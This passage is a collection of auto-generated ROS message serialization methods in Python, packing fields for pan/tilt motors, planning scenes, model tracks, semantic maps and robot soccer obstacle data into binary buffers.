self.pan.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_6f3df3I.pack(_x.pan.current, _x.pan.pos_rad, _x.pan.vel_rps, _x.pan.torque_nm, _x.pan.pwm, _x.pan.encoder_rad, _x.pan.accel.x, _x.pan.accel.y, _x.pan.accel.z, _x.pan.temperature_degC, _x.tilt.header.seq, _x.tilt.header.stamp.secs, _x.tilt.header.stamp.nsecs))\n _x = self.tilt.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_6f3df.pack(_x.tilt.current, _x.tilt.pos_rad, _x.tilt.vel_rps, _x.tilt.torque_nm, _x.tilt.pwm, _x.tilt.encoder_rad, _x.tilt.accel.x, _x.tilt.accel.y, _x.tilt.accel.z, _x.tilt.temperature_degC))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs))\n _x = self.planning_scene.robot_state.joint_state.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene.robot_state.joint_state.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.joint_state.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.joint_state.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene.robot_state.joint_state.position.tostring())\n length = len(self.planning_scene.robot_state.joint_state.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene.robot_state.joint_state.velocity.tostring())\n length = len(self.planning_scene.robot_state.joint_state.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene.robot_state.joint_state.effort.tostring())\n _x = self\n buff.write(_struct_2I.pack(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.joint_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.joint_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.poses)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.poses:\n _v169 = val1.position\n _x = _v169\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v170 = val1.orientation\n _x = _v170\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.fixed_frame_transforms)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.fixed_frame_transforms:\n _v171 = val1.header\n buff.write(_struct_I.pack(_v171.seq))\n _v172 = _v171.stamp\n _x = _v172\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v171.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.child_frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v173 = val1.transform\n _v174 = _v173.translation\n _x = _v174\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v175 = _v173.rotation\n _x = _v175\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.allowed_collision_matrix.link_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_collision_matrix.link_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.allowed_collision_matrix.entries)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_collision_matrix.entries:\n length = len(val1.enabled)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(val1.enabled.tostring())\n length = len(self.planning_scene.allowed_contacts)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_contacts:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v176 = val1.shape\n buff.write(_struct_b.pack(_v176.type))\n length = len(_v176.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(_v176.dimensions.tostring())\n length = len(_v176.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(_v176.triangles.tostring())\n length = len(_v176.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in _v176.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v177 = val1.pose_stamped\n _v178 = _v177.header\n buff.write(_struct_I.pack(_v178.seq))\n _v179 = _v178.stamp\n _x = _v179\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v178.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v180 = _v177.pose\n _v181 = _v180.position\n _x = _v181\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v182 = _v180.orientation\n _x = _v182\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.link_names)\n buff.write(_struct_I.pack(length))\n for val2 in val1.link_names:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n buff.write(_struct_d.pack(val1.penetration_depth))\n length = len(self.planning_scene.link_padding)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.link_padding:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(val1.padding))\n length = len(self.planning_scene.collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.collision_objects:\n _v183 = val1.header\n buff.write(_struct_I.pack(_v183.seq))\n _v184 = _v183.stamp\n _x = _v184\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v183.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.padding))\n _v185 = val1.operation\n buff.write(_struct_b.pack(_v185.operation))\n length = len(val1.shapes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.shapes:\n buff.write(_struct_b.pack(val2.type))\n length = len(val2.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(val2.dimensions.tostring())\n length = len(val2.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(val2.triangles.tostring())\n length = len(val2.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in val2.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(val1.poses)\n buff.write(_struct_I.pack(length))\n for val2 in val1.poses:\n _v186 = val2.position\n _x = _v186\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v187 = val2.orientation\n _x = _v187\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.attached_collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.attached_collision_objects:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v188 = val1.object\n _v189 = _v188.header\n buff.write(_struct_I.pack(_v189.seq))\n _v190 = _v189.stamp\n _x = _v190\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v189.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v188.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(_v188.padding))\n _v191 = _v188.operation\n buff.write(_struct_b.pack(_v191.operation))\n length = len(_v188.shapes)\n buff.write(_struct_I.pack(length))\n for val3 in _v188.shapes:\n buff.write(_struct_b.pack(val3.type))\n length = len(val3.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(val3.dimensions.tostring())\n length = len(val3.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(val3.triangles.tostring())\n length = len(val3.vertices)\n buff.write(_struct_I.pack(length))\n for val4 in val3.vertices:\n _x = val4\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(_v188.poses)\n buff.write(_struct_I.pack(length))\n for val3 in _v188.poses:\n _v192 = val3.position\n _x = _v192\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v193 = val3.orientation\n _x = _v193\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.touch_links)\n buff.write(_struct_I.pack(length))\n for val2 in val1.touch_links:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs))\n _x = self.planning_scene.collision_map.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene.collision_map.boxes)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.collision_map.boxes:\n _v194 = val1.center\n _x = _v194\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v195 = val1.extents\n _x = _v195\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v196 = val1.axis\n _x = _v196\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n buff.write(_struct_f.pack(val1.angle))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.model_aligned.header.seq, _x.model_aligned.header.stamp.secs, _x.model_aligned.header.stamp.nsecs))\n _x = self.model_aligned.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model_aligned.id))\n _x = self.model_aligned.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model_aligned.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.model_aligned.track.header.seq, _x.model_aligned.track.header.stamp.secs, _x.model_aligned.track.header.stamp.nsecs))\n _x = self.model_aligned.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model_aligned.track.id))\n length = len(self.model_aligned.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose:\n _v85 = val1.position\n _x = _v85\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v86 = val1.orientation\n _x = _v86\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v87 = val1.stamp\n _x = _v87\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model_aligned.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_projected:\n _v88 = val1.position\n _x = _v88\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v89 = val1.orientation\n _x = _v89\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_resampled:\n _v90 = val1.position\n _x = _v90\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v91 = val1.orientation\n _x = _v91\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(self.model_aligned.track.pose_flags.tostring())\n length = len(self.model_aligned.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val1.values.tostring())\n _x = self\n buff.write(_struct_3I.pack(_x.data_aligned.header.seq, _x.data_aligned.header.stamp.secs, _x.data_aligned.header.stamp.nsecs))\n _x = self.data_aligned.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data_aligned.id))\n _x = self.data_aligned.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_aligned.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.data_aligned.track.header.seq, _x.data_aligned.track.header.stamp.secs, _x.data_aligned.track.header.stamp.nsecs))\n _x = self.data_aligned.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data_aligned.track.id))\n length = len(self.data_aligned.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose:\n _v92 = val1.position\n _x = _v92\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v93 = val1.orientation\n _x = _v93\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v94 = val1.stamp\n _x = _v94\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_aligned.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_projected:\n _v95 = val1.position\n _x = _v95\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v96 = val1.orientation\n _x = _v96\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_resampled:\n _v97 = val1.position\n _x = _v97\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v98 = val1.orientation\n _x = _v98\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(self.data_aligned.track.pose_flags.tostring())\n length = len(self.data_aligned.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val1.values.tostring())\n buff.write(self.R.tostring())\n buff.write(self.T.tostring())\n _x = self\n buff.write(_struct_df.pack(_x.dist_rot, _x.dist_trans))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.namespace\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.prefixes)\n buff.write(_struct_I.pack(length))\n for val1 in self.prefixes:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.prefix\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.imports)\n buff.write(_struct_I.pack(length))\n for val1 in self.imports:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *val1))\n else:\n buff.write(struct.pack('<I%ss'%length, length, val1))\n _x = self.address.room_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.floor_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.street_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.street_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.city_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.objects:\n _v13 = val1.header\n buff.write(_struct_I.pack(_v13.seq))\n _v14 = _v13.stamp\n _x = _v14\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v13.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v15 = val1.size\n _x = _v15\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v16 = val1.pose\n _v17 = _v16.position\n _x = _v17\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v18 = _v16.orientation\n _x = _v18\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n _x = val1.part_of\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.actions)\n buff.write(_struct_I.pack(length))\n for val1 in self.actions:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_B.pack(val1.asserted))\n _x = val1.object_acted_on\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.subactions)\n buff.write(_struct_I.pack(length))\n for val2 in val1.subactions:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *val2))\n else:\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = val1\n buff.write(_struct_bB.pack(_x.quantification, _x.unordered))\n length = len(self.object_properties)\n buff.write(_struct_I.pack(length))\n for val1 in self.object_properties:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.subject\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_properties)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_properties:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.subject\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_B.pack(val1.value_type))\n _x = val1.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.obstacleinfo.header.seq, _x.obstacleinfo.header.stamp.secs, _x.obstacleinfo.header.stamp.nsecs))\n _x = self.obstacleinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.obstacleinfo.pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.obstacleinfo.pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.obstacleinfo.polar_pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.obstacleinfo.polar_pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n _x = self\n buff.write(_get_struct_3I().pack(_x.oppinfo.header.seq, _x.oppinfo.header.stamp.secs, _x.oppinfo.header.stamp.nsecs))\n _x = self.oppinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.oppinfo.pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.oppinfo.pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.oppinfo.polar_pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.oppinfo.polar_pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n length = len(self.robotinfo)\n buff.write(_struct_I.pack(length))\n for val1 in self.robotinfo:\n _v23 = val1.header\n buff.write(_get_struct_I().pack(_v23.seq))\n _v24 = _v23.stamp\n _x = _v24\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v23.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_7i().pack(_x.AgentID, _x.targetNum1, 